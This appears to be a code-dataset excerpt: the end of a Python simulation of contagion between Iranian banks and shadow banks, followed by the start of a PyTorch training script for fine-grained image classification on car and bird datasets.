0.1, 0.07, 0.05, 0.05, 0.05, 1)\nbank_refah = Bank(2.4, 3.1, 19.1, 4.5, 25.9, 0.2, 3.1, 0.1, 0.1, 0.1, 0.1, 0.07, 0.05, 0.05, 0.05, 1)\nbank_ayandeh = Bank(1.5, 21.8, 97.6, 79.3, 186.1, 22.8, -8.7, 0.1, 0.1, 0.1, 0.1, 0.07, 0.05, 0.05, 0.05, 1)\nbank_gardeshgary = Bank(1, 0.2, 19.8, 29.7, 38.4, 8.4, 3.8, 0.1, 0.1, 0.1, 0.1, 0.07, 0.05, 0.05, 0.05, 1)\nbank_iranzamin = Bank(0.3, 4.1, 3.5, 29.2, 33.6, 6.1, -2.6, 0.1, 0.1, 0.1, 0.1, 0.07, 0.05, 0.05, 0.05, 1)\nbank_sarmaye = Bank(0.5, 2.7, 5.4, 5.4, 18.3, 21.7, -26.1, 0.1, 0.1, 0.1, 0.1, 0.07, 0.05, 0.05, 0.05, 0)\nbank_pasargad = Bank(18.7, 21.6, 79.9, 45.8, 116.9, 19.3, 29.9, 0.1, 0.1, 0.1, 0.1, 0.07, 0.05, 0.05, 0.05, 1)\nbank_melal = Bank(0.2, 2.3, 10.8, 21.1, 15.2, 15, 4, 0.1, 0.1, 0.1, 0.1, 0.07, 0.05, 0.05, 0.05, 1)\n\n# introduction of Iranian Shadow Banks\n\nshadow1 = Shadow_Bank(np.random.normal(45), np.random.normal(3.5), np.random.normal(41.5), 0.01, 0.01)\nshadow2 = Shadow_Bank(np.random.normal(45), np.random.normal(3.5), np.random.normal(41.5), 0.3, 0.3)\nshadow3 = Shadow_Bank(np.random.normal(45), np.random.normal(3.5), np.random.normal(41.5), 0.91, 0.01)\nshadow4 = Shadow_Bank(np.random.normal(45), np.random.normal(3.5), np.random.normal(41.5), 0.1, 0.1)\nshadow5 = Shadow_Bank(np.random.normal(45), np.random.normal(3.5), np.random.normal(41.5), 0.1, 0.1)\nshadow6 = Shadow_Bank(np.random.normal(45), np.random.normal(3.5), np.random.normal(41.5), 0.1, 0.1)\nshadow7 = Shadow_Bank(np.random.normal(45), np.random.normal(3.5), np.random.normal(41.5), 0.1, 0.1)\nshadow8 = Shadow_Bank(np.random.normal(45), np.random.normal(3.5), np.random.normal(41.5), 0.1, 0.1)\nshadow9 = Shadow_Bank(np.random.normal(45), np.random.normal(3.5), np.random.normal(41.5), 0.1, 0.1)\nshadow10 = Shadow_Bank(np.random.normal(45), np.random.normal(3.5), np.random.normal(41.5), 0.1, 0.1)\nshadow11 = Shadow_Bank(np.random.normal(45), np.random.normal(3.5), np.random.normal(41.5), 0.1, 0.1)\nshadow12 = Shadow_Bank(np.random.normal(45), np.random.normal(3.5), np.random.normal(41.5), 0.1, 0.1)\nshadow13 = Shadow_Bank(np.random.normal(45), np.random.normal(3.5), np.random.normal(41.5), 0.1, 0.1)\nshadow14 = Shadow_Bank(np.random.normal(45), np.random.normal(3.5), np.random.normal(41.5), 0.1, 0.1)\nshadow15 = Shadow_Bank(np.random.normal(45), np.random.normal(3.5), np.random.normal(41.5), 0.1, 0.1)\n\n\n#####################################################\n\n#####################################################\n# 1-BL 2-S 3-BB 4-L 5-C\n# optimixation phase\n### objective function of banks\n\ndef optimize_bank(mmm):\n if mmm.bankrupt == False:\n c = np.array([-rfree, -mmm.ret_on_sec, ((rfree * mmm.borrow_from_banks) / (1 - mmm.zeta * mmm.pd)), 0, 0])\n A_ub = np.array([[(-1 + mmm.car * mmm.xbl), (-1 + mmm.car * mmm.xs), 1, (-1 + mmm.car * mmm.xl), -1],\n [-1, 0, (mmm.alpha_min + mmm.provision_per), 0, -1], [0, 0, 0, 0, -1], [0, 1, 0, 0, 0]])\n b_ub = np.array([-mmm.deposits, -(mmm.alpha_min + mmm.provision_per) * mmm.deposits,\n -(mmm.alpha_min + mmm.provision_per) * mmm.deposits, mmm.etha_max * mmm.total_assets])\n A_eq = np.array([[1, 1, -1, 1, 1], [0, 0, -1, 2, 0]])\n b_eq = np.array([mmm.deposits + mmm.equity, mmm.deposits + mmm.equity])\n x0_bounds = (0, None)\n x1_bounds = (0, None)\n x2_bounds = (0, None)\n x3_bounds = (0, None)\n x4_bounds = (0, None)\n bounds = [x0_bounds, x1_bounds, x2_bounds, x3_bounds, x4_bounds]\n result = linprog(c, A_ub=A_ub, b_ub=b_ub, A_eq=A_eq, b_eq=b_eq, bounds=bounds)\n mmm.bank_cash = result.x[4]\n mmm.lend_to_banks = result.x[0]\n mmm.lend_to_loans = result.x[3]\n bank_sec_old = mmm.bank_sec\n mmm.bank_sec = result.x[1]\n mmm.borrow_from_banks = result.x[2]\n mmm.ret_on_sec = float(np.random.normal(ret_sec_bank, ret_sec_bank_sigma))\n mmm.net_income = (mmm.ret_on_sec * mmm.bank_sec) + (rfree * mmm.lend_to_banks) - (\n (rfree * mmm.borrow_from_banks) / (1 - mmm.zeta * mmm.pd))\n mmm.sigma = abs(mmm.phi * (mmm.deposits + mmm.equity))\n mmm.profit = float(np.random.normal(mmm.net_income, mmm.sigma, 1))\n\n mmm.sec_sale = bank_sec_old - mmm.bank_sec\n if mmm.sec_sale > 0:\n mmm.demand_of_stock_b = 0\n mmm.supply_of_stock_b = mmm.security_sale\n elif mmm.security_sale < 0:\n mmm.demand_of_stock_b = mmm.security_sale\n mmm.supply_of_stock_b = 0\n else:\n mmm.demand_of_stock_b = 0\n mmm.supply_of_stock_b = 0\n\n mmm = Bank(result.x[4], result.x[0], result.x[3], result.x[1], result.x[2], mmm.deposits, mmm.equity,\n mmm.alpha_min, mmm.provision_per, mmm.phi, mmm.zeta, mmm.car, mmm.xs, mmm.xbl, mmm.xl, mmm.etha_max)\n else:\n mmm = Bank(0, 0, 0, 0, 0, 0, 0, mmm.alpha_min, mmm.provision_per, mmm.phi, mmm.zeta, mmm.car, mmm.xs, mmm.xbl,\n mmm.xl, mmm.etha_max)\n\n ########################################################\n # optimixation phase\n ### objective function of shadow banks\n # 1- security 2-cash\n\n\ndef optimize_shadow_bank(nnn):\n c_s = np.array([np.random.normal(-ret_sec_shbank, 0.01), 0])\n A_ub_s = np.array([[0, -1]])\n b_ub_s = np.array([-(nnn.s_alpha + nnn.s_provision) * nnn.participation])\n A_eq_s = np.array([[1, 1]])\n b_eq_s = np.array([nnn.participation])\n x0_bounds_s = (0, None)\n x1_bounds_s = (0, None)\n\n bounds_s = [x0_bounds_s, x1_bounds_s]\n result_s = linprog(c_s, A_ub=A_ub_s, b_ub=b_ub_s, A_eq=A_eq_s, b_eq=b_eq_s, bounds=bounds_s)\n nnn.shadow_bank_cash = result_s.x[1]\n nnn.security_old = nnn.security\n nnn.security = result_s.x[0]\n nnn.shadow_bank_cash = result_s.x[1]\n\n nnn.security_sale = nnn.security_old - nnn.security\n if nnn.security_sale > 0:\n nnn.demand_of_stock = 0\n nnn.supply_of_stock = nnn.security_sale\n elif nnn.security_sale < 0:\n nnn.demand_of_stock = abs(nnn.security_sale)\n nnn.supply_of_stock = 0\n else:\n nnn.demand_of_stock = 0\n nnn.supply_of_stock = 0\n\n nnn = Shadow_Bank((result_s.x[0] + result_s.x[1]), result_s.x[0], result_s.x[1], nnn.s_alpha, nnn.s_provision)\n\n\n######################################################################################################\n\ndef redemption(www):\n p_change = 1 - (p_market / p_market_old)\n if p_change < 0:\n www.redemption = 0\n else:\n www.redemption = www.participation * ((math.exp(etha * p_change) - 1))\n\n if www.redemption < www.shadow_bank_cash:\n www.shadow_bank_cash = www.shadow_bank_cash - www.redemption\n www.participation = www.participation - www.redemption\n\n elif www.shadow_bank_cash < www.redemption < www.security + www.shadow_bank_cash:\n www.shadow_bank_cash = 0\n www.security = www.security + www.shadow_bank_cash - www.redemption\n www.participation = www.participation - www.redemption\n elif www.security + www.shadow_bank_cash < www.redemption:\n www.exit = True\n www.participation = 0\n www.security = 0\n www.shadow_bank_cash = 0\n\n\n###############################################################\n##### dynamics of model\n# the name of bank which is source of the shock\n\nshock_hit = bank_melli\n\nsig = 0.5\nshock = sig * (shock_hit.deposits + shock_hit.borrow_from_banks)\n\n\ndef dynamic_bank(www):\n if shock <= www.bank_cash:\n www.equity = www.equity - shock\n www.bank_cash = www.bank_cash - shock\n elif (www.bank_cash + www.lend_to_banks) >= shock >= www.bank_cash:\n landa = (sig * (www.deposits + www.borrow_from_banks)) - www.bank_cash\n www.equity = www.equity - www.bank_cash\n www.bank_cash = 0\n www.lend_to_banks = www.lend_to_banks - (shock - www.bank_cash)\n elif (www.bank_cash + www.lend_to_banks + www.bank_sec) >= shock >= (www.bank_cash + www.lend_to_banks):\n delta = www.bank_cash + www.lend_to_banks + www.bank_sec - shock\n www.bank_cash = 0\n www.equity = www.equity - www.bank_cash\n www.lend_to_banks = 0\n www.bank_sec = www.bank_sec - delta\n www.stock = www.bank_sec / p_market\n elif (www.bank_cash + www.lend_to_banks + www.bank_sec) <= shock:\n www.bank_cash = 0\n www.equity = 0\n www.lend_to_banks = 0\n www.bank_sec = 0\n www.borrow_from_banks = 0\n www.bankrupt = True\n\n\n###############################################################\n################ start the simulation\n################\ndynamic_bank(shock_hit)\nfor ttt in range(n_sim):\n\n # first banks\n optimize_bank(bank_melli)\n optimize_bank(bank_seppah)\n optimize_bank(bank_tosesaderat)\n optimize_bank(bank_maskan)\n optimize_bank(bank_sanatmadan)\n optimize_bank(bank_keshavarzi)\n optimize_bank(bank_tosetavon)\n optimize_bank(bank_post)\n optimize_bank(bank_eghtesadnovin)\n optimize_bank(bank_parsian)\n optimize_bank(bank_karafarin)\n optimize_bank(bank_saman)\n optimize_bank(bank_sina)\n optimize_bank(bank_khavarmiane)\n optimize_bank(bank_shahr)\n optimize_bank(bank_dey)\n optimize_bank(bank_saderat)\n optimize_bank(bank_tejarat)\n optimize_bank(bank_mellat)\n optimize_bank(bank_refah)\n optimize_bank(bank_ayandeh)\n optimize_bank(bank_gardeshgary)\n optimize_bank(bank_iranzamin)\n optimize_bank(bank_sarmaye)\n optimize_bank(bank_pasargad)\n optimize_bank(bank_melal)\n\n # second shadow banks determine the redemptions because it is almost a legal issue the they optimize which is a ecnomic behaviour\n\n redemption(shadow1)\n redemption(shadow2)\n redemption(shadow3)\n redemption(shadow4)\n redemption(shadow5)\n redemption(shadow6)\n redemption(shadow7)\n redemption(shadow8)\n redemption(shadow9)\n redemption(shadow10)\n redemption(shadow11)\n redemption(shadow12)\n redemption(shadow13)\n redemption(shadow14)\n redemption(shadow15)\n\n ## optimization of shadow banks\n\n optimize_shadow_bank(shadow1)\n optimize_shadow_bank(shadow2)\n optimize_shadow_bank(shadow3)\n optimize_shadow_bank(shadow4)\n optimize_shadow_bank(shadow5)\n optimize_shadow_bank(shadow6)\n optimize_shadow_bank(shadow7)\n optimize_shadow_bank(shadow8)\n optimize_shadow_bank(shadow9)\n optimize_shadow_bank(shadow10)\n optimize_shadow_bank(shadow11)\n optimize_shadow_bank(shadow12)\n optimize_shadow_bank(shadow13)\n optimize_shadow_bank(shadow14)\n optimize_shadow_bank(shadow15)\n\n demand_of_banks = bank_melli.borrow_from_banks + bank_seppah.borrow_from_banks + bank_tosesaderat.borrow_from_banks + bank_maskan.borrow_from_banks + bank_sanatmadan.borrow_from_banks + bank_keshavarzi.borrow_from_banks + bank_tosetavon.borrow_from_banks + bank_post.borrow_from_banks + bank_eghtesadnovin.borrow_from_banks + bank_parsian.borrow_from_banks + bank_karafarin.borrow_from_banks + bank_saman.borrow_from_banks + bank_saman.borrow_from_banks + bank_sina.borrow_from_banks + bank_khavarmiane.borrow_from_banks + bank_shahr.borrow_from_banks + bank_dey.borrow_from_banks + bank_saderat.borrow_from_banks + bank_tejarat.borrow_from_banks + bank_mellat.borrow_from_banks + bank_refah.borrow_from_banks + bank_ayandeh.borrow_from_banks + bank_gardeshgary.borrow_from_banks + bank_iranzamin.borrow_from_banks + bank_sarmaye.borrow_from_banks + bank_sarmaye.borrow_from_banks + bank_pasargad.borrow_from_banks + bank_melal.borrow_from_banks\n supply_of_banks = bank_melli.lend_to_banks + bank_seppah.lend_to_banks + bank_tosesaderat.lend_to_banks + bank_maskan.lend_to_banks + bank_sanatmadan.lend_to_banks + bank_keshavarzi.lend_to_banks + bank_tosetavon.lend_to_banks + bank_post.lend_to_banks + bank_eghtesadnovin.lend_to_banks + bank_parsian.lend_to_banks + bank_karafarin.lend_to_banks + bank_saman.lend_to_banks + bank_saman.lend_to_banks + bank_sina.lend_to_banks + bank_khavarmiane.lend_to_banks + bank_shahr.lend_to_banks + bank_dey.lend_to_banks + bank_saderat.lend_to_banks + bank_tejarat.lend_to_banks + bank_mellat.lend_to_banks + bank_refah.lend_to_banks + bank_ayandeh.lend_to_banks + bank_gardeshgary.lend_to_banks + bank_iranzamin.lend_to_banks + bank_sarmaye.lend_to_banks + bank_sarmaye.lend_to_banks + bank_pasargad.lend_to_banks + bank_melal.lend_to_banks\n diference = demand_of_banks - supply_of_banks\n\n if demand_of_banks > supply_of_banks:\n # rrr = (demand_of_banks/supply_of_banks) - 1\n # rfree = (1+rrr) * rfree\n rfree = (rfree + rfree_max) / 2\n elif demand_of_banks < supply_of_banks:\n # rrr = (supply_of_banks / demand_of_banks) - 1\n # rfree = (1 - rrr) * rfree\n rfree = (rfree + rfree_min) / 2\n else:\n rfree = rfree\n\n rfree_vector.append(rfree)\n\n stock_supply_of_banks = bank_melli.supply_of_stock_b + bank_seppah.supply_of_stock_b + bank_tosesaderat.supply_of_stock_b + bank_maskan.supply_of_stock_b + bank_sanatmadan.supply_of_stock_b + bank_keshavarzi.supply_of_stock_b + bank_tosetavon.supply_of_stock_b + bank_post.supply_of_stock_b + bank_eghtesadnovin.supply_of_stock_b + bank_parsian.supply_of_stock_b + bank_karafarin.supply_of_stock_b + bank_saman.supply_of_stock_b + bank_saman.supply_of_stock_b + bank_sina.supply_of_stock_b + bank_khavarmiane.supply_of_stock_b + bank_shahr.supply_of_stock_b + bank_dey.supply_of_stock_b + bank_saderat.supply_of_stock_b + bank_tejarat.supply_of_stock_b + bank_mellat.supply_of_stock_b + bank_refah.supply_of_stock_b + bank_ayandeh.supply_of_stock_b + bank_gardeshgary.supply_of_stock_b + bank_iranzamin.supply_of_stock_b + bank_sarmaye.supply_of_stock_b + bank_sarmaye.supply_of_stock_b + bank_pasargad.supply_of_stock_b + bank_melal.supply_of_stock_b\n stock_demand_of_banks = bank_melli.demand_of_stock_b + bank_seppah.demand_of_stock_b + bank_tosesaderat.demand_of_stock_b + bank_maskan.demand_of_stock_b + bank_sanatmadan.demand_of_stock_b + bank_keshavarzi.demand_of_stock_b + bank_tosetavon.demand_of_stock_b + bank_post.demand_of_stock_b + bank_eghtesadnovin.demand_of_stock_b + bank_parsian.demand_of_stock_b + bank_karafarin.demand_of_stock_b + bank_saman.demand_of_stock_b + bank_saman.demand_of_stock_b + bank_sina.demand_of_stock_b + bank_khavarmiane.demand_of_stock_b + bank_shahr.demand_of_stock_b + bank_dey.demand_of_stock_b + bank_saderat.demand_of_stock_b + bank_tejarat.demand_of_stock_b + bank_mellat.demand_of_stock_b + bank_refah.demand_of_stock_b + bank_ayandeh.demand_of_stock_b + bank_gardeshgary.demand_of_stock_b + bank_iranzamin.demand_of_stock_b + bank_sarmaye.demand_of_stock_b + bank_sarmaye.demand_of_stock_b + bank_pasargad.demand_of_stock_b + bank_melal.demand_of_stock_b\n stock_demand_of_shadow_banks = shadow1.demand_of_stock + shadow2.demand_of_stock + shadow3.demand_of_stock + shadow4.demand_of_stock + shadow5.demand_of_stock + shadow6.demand_of_stock + shadow7.demand_of_stock + shadow8.demand_of_stock + shadow9.demand_of_stock + shadow10.demand_of_stock + shadow11.demand_of_stock + shadow12.demand_of_stock + shadow13.demand_of_stock + shadow14.demand_of_stock + shadow15.demand_of_stock\n stock_supply_of_shadow_banks = shadow1.supply_of_stock + shadow2.supply_of_stock + shadow3.supply_of_stock + shadow4.supply_of_stock + shadow5.supply_of_stock + shadow6.supply_of_stock + shadow7.supply_of_stock + shadow8.supply_of_stock + shadow9.supply_of_stock + shadow10.supply_of_stock + shadow11.supply_of_stock + shadow12.supply_of_stock + shadow13.supply_of_stock + shadow14.supply_of_stock + shadow15.supply_of_stock\n total_stock_demand = stock_demand_of_banks + stock_demand_of_shadow_banks\n total_stock_supply = stock_supply_of_banks + stock_supply_of_shadow_banks\n\n p_market_old = p_market\n\n if total_stock_demand > total_stock_supply:\n p_market = (p_market + p_market_max) / 2\n elif demand_of_banks < supply_of_banks:\n p_market = (p_market + p_market_min) / 2\n else:\n p_market = p_market\n\n ret_on_sec = p_market / p_market_old - 1\n ret_sec_shbank = ret_on_sec\n p_market_vector.append(p_market)\n ret_sec_bank_vector.append(ret_on_sec)\n\n every = total_stock_demand\n every_thing_vector.append(every)\n\n every1 = total_stock_supply\n every1_thing_vector.append(every1)\n\n every2 = p_market\n every2_thing_vector.append(every2)\n\n# rfree_plot = []\n# for i in range(0, len(rfree_vector)):\n# rfree_plot.append([float(rfree_vector[i])])\n#\n# p_market_plot = []\n# for i in range(0, len(p_market_vector)):\n# p_market_plot.append([float(p_market_vector[i])])\n#\n# ret_on_sec_plot = []\n# for i in range(0, len(ret_sec_bank_vector)):\n# ret_on_sec_plot.append([float(ret_sec_bank_vector[i])])\n\nevery_thing_plot = []\nfor i in range(0, len(every_thing_vector)):\n every_thing_plot.append([float(every_thing_vector[i])])\n\nevery1_thing_plot = []\nfor i in range(0, len(every1_thing_vector)):\n every1_thing_plot.append([float(every1_thing_vector[i])])\n\nevery2_thing_plot = []\nfor i in range(0, len(every2_thing_vector)):\n every2_thing_plot.append([float(every2_thing_vector[i])])\n\n# print(ret_on_sec_plot)\n# print(p_market_plot)\n# print(rfree_plot)\n# print(every_thing_vector)\n\n\n# plt.plot(rfree_plot)\n# plt.show()\n# plt.plot(p_market_plot)\n# plt.show()\n# plt.plot(ret_on_sec_plot)\n# plt.show()\n\nplt.plot(every_thing_plot)\nplt.plot(every1_thing_plot)\nplt.plot(every2_thing_plot)\n\nplt.show()\n#\n# plt.plot(every2_thing_plot)\n# plt.show()\n\n\n# print(every_thing_plot)\n# print(every1_thing_plot)\n# print(every2_thing_plot)", "repo_name": "vahidito/banking-system-model", "sub_path": "banking system model.py", "file_name": "banking system model.py", "file_ext": "py", "file_size_in_byte": 22345, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "numpy.random.normal", "line_number": 21, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 21, "usage_type": "attribute"}, {"api_name": "numpy.random.normal", "line_number": 62, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 62, "usage_type": "attribute"}, {"api_name": "numpy.random.beta", "line_number": 73, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 73, "usage_type": "attribute"}, {"api_name": "numpy.random.normal", "line_number": 85, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 85, "usage_type": "attribute"}, {"api_name": "numpy.random.normal", "line_number": 124, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 124, "usage_type": "attribute"}, {"api_name": "numpy.random.normal", "line_number": 125, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 125, "usage_type": "attribute"}, {"api_name": "numpy.random.normal", "line_number": 126, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 126, "usage_type": "attribute"}, {"api_name": "numpy.random.normal", "line_number": 127, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 127, "usage_type": "attribute"}, {"api_name": "numpy.random.normal", "line_number": 128, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 128, "usage_type": "attribute"}, {"api_name": "numpy.random.normal", "line_number": 129, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 129, "usage_type": "attribute"}, {"api_name": "numpy.random.normal", "line_number": 130, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 130, "usage_type": "attribute"}, {"api_name": "numpy.random.normal", "line_number": 131, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 131, "usage_type": "attribute"}, {"api_name": "numpy.random.normal", "line_number": 132, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 132, "usage_type": "attribute"}, {"api_name": "numpy.random.normal", "line_number": 133, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 133, "usage_type": "attribute"}, {"api_name": "numpy.random.normal", "line_number": 134, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 134, "usage_type": "attribute"}, {"api_name": "numpy.random.normal", "line_number": 135, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 135, "usage_type": "attribute"}, {"api_name": "numpy.random.normal", "line_number": 136, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 136, "usage_type": "attribute"}, {"api_name": "numpy.random.normal", "line_number": 137, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 137, "usage_type": "attribute"}, {"api_name": "numpy.random.normal", "line_number": 138, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 138, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 150, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 151, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 153, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 155, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 156, "usage_type": "call"}, {"api_name": "scipy.optimize.linprog", "line_number": 163, "usage_type": "call"}, {"api_name": "numpy.random.normal", "line_number": 170, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 170, "usage_type": "attribute"}, {"api_name": "numpy.random.normal", "line_number": 174, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 174, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 200, "usage_type": "call"}, {"api_name": "numpy.random.normal", "line_number": 200, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 200, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 201, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 202, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 203, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 204, "usage_type": "call"}, {"api_name": "scipy.optimize.linprog", "line_number": 209, "usage_type": "call"}, {"api_name": "math.exp", "line_number": 236, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 442, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 442, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 443, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 443, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 444, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 444, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 446, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 446, "usage_type": "name"}]} +{"seq_id": "21900582791", "text": "from dv.DFL import DFL_VGG16, DFL_ResNet50, Energy_ResNet50\nfrom dv.init import *\nfrom dv.MyImageFolderWithPaths import CarsDataset, CUB_2011\nfrom dv.transform import *\nfrom dv.util import *\nfrom train import *\nfrom validate import *\nfrom visualize import *\nimport sys\nimport argparse\nimport os\nimport torch\nimport torch.nn as nn\nimport torch.backends.cudnn as cudnn\nimport torchvision.transforms as transforms\nimport torchvision.datasets as datasets\n\nparser = argparse.ArgumentParser(description='Discriminative Filter Learning within a CNN')\nparser.add_argument('--dataroot', metavar='DIR',\n help='path to dataset')\nparser.add_argument('--result', metavar='DIR',\n help='path to store visualization outputs')\nparser.add_argument('--vis_img', metavar='DIR',\n help='path to get images to visualize')\nparser.add_argument('-j', '--workers', default=4, type=int, metavar='N',\n help='number of data loading workers (default: 4)')\nparser.add_argument('--num_filters', default=4, type=int,\n help='Number of filters per class.')\nparser.add_argument('--gpu', default=4, type=int,\n help='GPU nums to use.')\nparser.add_argument('--epochs', default=100000, type=int, metavar='N',\n help='number of total epochs to run')\nparser.add_argument('--start_epoch', default=0, type=int, metavar='N',\n help='manual epoch number (useful on restarts)')\nparser.add_argument('--train_batchsize_per_gpu', default=4, type=int,\n metavar='N', help='mini-batch size (default: 4)')\nparser.add_argument('-testbatch', '--test_batch_size', default=1, type=int,\n metavar='N', help='mini-batch size (default: 1)')\nparser.add_argument('--init_type', default='xavier', type=str,\n metavar='INIT',help='init net')\nparser.add_argument('--lr', '--learning-rate', default=0.001, type=float,\n metavar='LR', help='initial learning rate')\nparser.add_argument('--momentum', default=0.9, type=float,\n metavar='momentum', help='momentum')\nparser.add_argument('--weight_decay', '--wd', default=0.0001, type=float,\n metavar='W', help='weight decay (default: 1e-4)')\nparser.add_argument('--print-freq', '-p', default=10, type=int,\n metavar='N', help='print frequency (default: 10)')\nparser.add_argument('--resume', default='', type=str, metavar='PATH',\n help='path to latest checkpoint (default: none)')\nparser.add_argument('-e', '--evaluate', dest='evaluate', action='store_true',\n help='evaluate model on validation set')\nparser.add_argument('--class_idx', default = 27, type = int, metavar='N',\n help='class number of the images to be visualized')\nparser.add_argument('--log_train_dir', default='log_train', type=str,\n help='log for train')\nparser.add_argument('--log_test_dir', default='log_test', type=str,\n help='log for test')\nparser.add_argument('--nclass', default=196, type=int,\n help='num of classes -- stanford cars has 196 classes (default: 196)')\nparser.add_argument('--eval_epoch', default=2, type=int,\n help='every eval_epoch we will evaluate')\nparser.add_argument('--vis_epoch', default=2, type=int,\n help='every vis_epoch we will evaluate')\nparser.add_argument('--w', default=448, type=int,\n help='desired image width to crop, seen as align')\nparser.add_argument('--h', default=448, type=int,\n help='desired image height to crop, seen as align')\nparser.add_argument('--dataset', default='cars', type=str,\n metavar='dataset',help='Data to use (cars, birds)')\n\nbest_prec1 = 0\n\ndef main():\n print('Deep Vision <==> Part1 : setting up parameters <==> Begin')\n global args, best_prec1\n args = parser.parse_args()\n print(sys.argv[1:])\n img_dir = os.path.abspath(args.dataroot)\n print('Deep Vision <==> Part1 : setting up parameters <==> Done')\n\n print('Deep Vision <==> Part2 : loading network <==> Begin')\n\n if args.vis_img is not None:\n print('Using VGG Backend...')\n model = DFL_VGG16(k = args.num_filters, nclass = args.nclass) # stanford cars has 196 classes\n else:\n print('Using ResNet Backend...')\n model = DFL_ResNet50(k = args.num_filters, nclass = args.nclass)\n energyNet = Energy_ResNet50(k = args.num_filters, nclass = args.nclass) # for non-random initialization\n\n device = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n if args.gpu is not None:\n model = nn.DataParallel(model, device_ids=range(args.gpu))\n model.to(device)\n if args.vis_img is None:\n energyNet.to(device)\n cudnn.benchmark = True\n\n if args.init_type is not None:\n transform_sample = get_transform_for_test_simple()\n\n if args.dataset == 'cars':\n sample_dataset = CarsDataset(os.path.join(img_dir,'devkit/cars_train_annos.mat'),\n os.path.join(img_dir,'cars_train'),\n os.path.join(img_dir,'devkit/cars_meta.mat'),\n transform=transform_sample\n )\n elif args.dataset == \"birds\":\n sample_dataset = CUB_2011(img_dir, train=True, transform=transform_sample, download=True)\n\n sample_loader = torch.utils.data.DataLoader(sample_dataset, batch_size=1, shuffle=True, num_workers=args.workers, pin_memory=True, drop_last = False)\n\n init_weights(model, init_type=args.init_type) # initialize all layers\n print('Network is initialized with: %s!' % args.init_type)\n if args.vis_img is None:\n center = init_patch(args, sample_loader, energyNet, 1024) #1024 channels in the feature map\n model.state_dict()['conv6.weight'] = center #the 1x1 filters are initialized with patch representations\n print('Patch detectors are initialized with non-random init!')\n model.to(device)\n\n criterion = nn.CrossEntropyLoss()\n optimizer = torch.optim.SGD(model.parameters(), lr=args.lr, momentum=args.momentum, weight_decay = args.weight_decay)\n\n # Optionally resume from a checkpoint\n if args.resume:\n if os.path.isfile(args.resume):\n checkpoint = torch.load(args.resume)\n args.start_epoch = checkpoint['epoch']\n best_prec1 = checkpoint['best_prec1']\n model.load_state_dict(checkpoint['state_dict'])\n optimizer.load_state_dict(checkpoint['optimizer'])\n print('Deep Vision <==> Part2 : loading network <==> Continue from {} epoch {}'.format(args.resume, checkpoint['epoch']))\n else:\n print('Deep Vision <==> Part2 : loading network <==> Failed')\n print('Deep Vision <==> Part2 : loading network <==> Done')\n\n\n\n print('Deep Vision <==> Part3 : loading dataset <==> Begin')\n\n # transformations are defined in \"dv\" module\n transform_train = get_transform_for_train()\n transform_test = get_transform_for_test()\n transform_test_simple = get_transform_for_test_simple()\n\n if args.dataset == \"birds\":\n train_dataset = CUB_2011(img_dir, train=True, transform=transform_train)\n test_dataset = CUB_2011(img_dir, train=False, transform=transform_test)\n test_dataset_simple = CUB_2011(img_dir, train=False, transform=transform_test_simple)\n elif args.dataset == \"cars\":\n train_dataset = CarsDataset(os.path.join(img_dir,'devkit/cars_train_annos.mat'),\n os.path.join(img_dir,'cars_train'),\n os.path.join(img_dir,'devkit/cars_meta.mat'),\n transform=transform_train\n )\n test_dataset = CarsDataset(os.path.join(img_dir,'devkit/cars_test_annos_withlabels.mat'),\n os.path.join(img_dir,'cars_test'),\n os.path.join(img_dir,'devkit/cars_meta.mat'),\n transform=transform_test\n )\n test_dataset_simple = CarsDataset(os.path.join(img_dir,'devkit/cars_test_annos_withlabels.mat'),\n os.path.join(img_dir,'cars_test'),\n os.path.join(img_dir,'devkit/cars_meta.mat'),\n transform=transform_test_simple\n )\n\n # data loader\n train_loader = torch.utils.data.DataLoader(\n train_dataset, batch_size=args.gpu * args.train_batchsize_per_gpu, shuffle=True,\n num_workers=args.workers, pin_memory=True, drop_last = False)\n test_loader = torch.utils.data.DataLoader(\n test_dataset, batch_size=args.test_batch_size, shuffle=True,\n num_workers=args.workers, pin_memory=True, drop_last = False)\n test_loader_simple = torch.utils.data.DataLoader(\n test_dataset_simple, batch_size=args.test_batch_size, shuffle=True,\n num_workers=args.workers, 